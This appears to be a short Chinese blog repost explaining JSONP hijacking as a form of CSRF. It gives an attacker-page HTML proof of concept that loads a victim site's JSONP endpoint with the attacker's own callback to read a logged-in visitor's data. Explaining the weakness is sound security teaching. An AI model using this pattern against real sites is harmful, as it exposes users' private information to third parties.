csrf攻击中的jsonp

来源:互联网 发布:洋洋网络客服管理制度 编辑:程序博客网 时间:2024/05/20 19:15

假设我的网站代码为

<!DOCTYPE html>
  <html>
  <head>
    
  </head>
  <body >
  <script type="text/javascript">
    function fun(x){
      alert(x)
    }
  </script>
   <script type="text/javascript" src='http://www.normal.com/jsonp.php?callback=fun'></script>
    </body>
  </html>


如果www.normal.com是通过jsonp的方式获取数据的,那么用户在登录www.normal.com的时候,如果访问了我的网站,那么我就能获取该用户的信息。

0 0
原创粉丝点击